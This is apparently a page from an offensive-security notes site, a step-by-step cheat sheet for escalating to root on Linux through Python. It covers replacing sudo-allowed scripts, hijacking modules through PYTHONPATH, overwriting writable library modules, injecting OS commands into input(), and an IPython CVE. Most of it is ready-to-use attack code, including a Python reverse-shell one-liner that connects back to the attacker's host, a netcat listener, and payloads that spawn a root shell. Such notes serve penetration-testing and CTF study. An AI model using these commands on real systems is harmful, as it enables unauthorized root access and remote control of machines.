# Python Privilege Escalation ### [Sudo PrivEsc](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/python-privilege-escalation/#sudo-privesc) #### [Replace with Arbitrary Script](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/python-privilege-escalation/#replace-with-arbitrary-script) ```bash sudo -l (root) NOPASSWD: /usr/bin/python3 /home//example.py Copied! ``` If the python script is under the current user's home directory, we can remove the script and create the new one with the same name. ```bash rm -rf /home//example.py touch /home//example.py Copied! ``` We can insert arbitrary code in the new script. For example, ```python import os;os.system('/bin/bash') Copied! ``` #### [Module Hijacking](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/python-privilege-escalation/#module-hijacking) Assume the python script can be executed as root with **SETENV,NOPASSWD**.\ For example, ```sh sudo -l (root) SETENV: NOPASSWD: /usr/bin/python3 /opt/example.py Copied! ``` With **SETENV**, we can change **PYTHONPATH** when executing the script, and insert malicious script to the module which is imported in the script.\ First off, check what module is imported in the python script (e.g. /opt/example.py here). ```python import random print(random.randint(1, 8)) Copied! ``` We can forge the imported module. ```sh vim /tmp/random.py Copied! ``` The content of the module is below. This is a script that executes reverse shell.\ Replace **``** with your local ip address. ```sh import socket,os,pty;s=socket.socket();s.connect(("",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash") Copied! ``` After that, in another local terminal, start listener for getting a shell. ```sh nc -lvnp 4444 Copied! ``` Then run the python script with updating **PYTHONPATH** in the remote machine. ```sh sudo PYTHONPATH=/tmp/ /usr/bin/python3 /opt/example.py Copied! ``` By setting **"PYTHONPATH=/tmp/"**, the python script will import modules from **/tmp/** directories so the **"random"** module is imported from **/tmp/random.py**.\ Finally, we should get a shell in local terminal. #### [Module Overriding](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/python-privilege-escalation/#module-overriding) If the Python script contains a module that can be modified by current user, we can inject arbitrary code into the module.\ First, check what modules the Python script uses. ```bash # example.py import random Copied! ``` Assume the **“random”** module is used in the script.\ Find the path of the module and check if it’s writable. ```bash find / -name "random.py" 2>/dev/null ls -al /usr/lib/python3.6/random.py Copied! ``` If we know we can modify it, inject arbitrary code in this module.\ Assume the **“random”** module path is **`/usr/lib/python3.6/random.py`**. ```python # /usr/lib/python3.6/random.py import os;os.sytem('/bin/bash') Copied! ``` Then execute the Python script and we can spawn the root shell.
### [OS Commands in input()](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/python-privilege-escalation/#os-commands-in-input\(\)) If you find the executable which is created in Python.\ For instance, ```sh ./executable Enter some input: Copied! ``` You can enter OS commands in some input. ```py __import__('os').system('id') Copied! ``` For example, ```sh ./executable Enter some input: __import__('os').system('id') Copied! ```
### [IPython Privilege Escalation (](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/python-privilege-escalation/#ipython-privilege-escalation-\(cve-2022-21699\))[CVE-2022-21699](https://github.com/advisories/GHSA-pq7m-3gw7-gq5x)) Interective Python (IPython) is a command shell for interective computing in multiple programming languages. ```sh # -m: file mode (rwx) mkdir -m 777 /tmp/profile_default mkdir -m 777 /tmp/profile_default/startup echo 'print("stealing your private secrets")' > /tmp/profile_default/startup/exploit.py Copied! ``` ### References *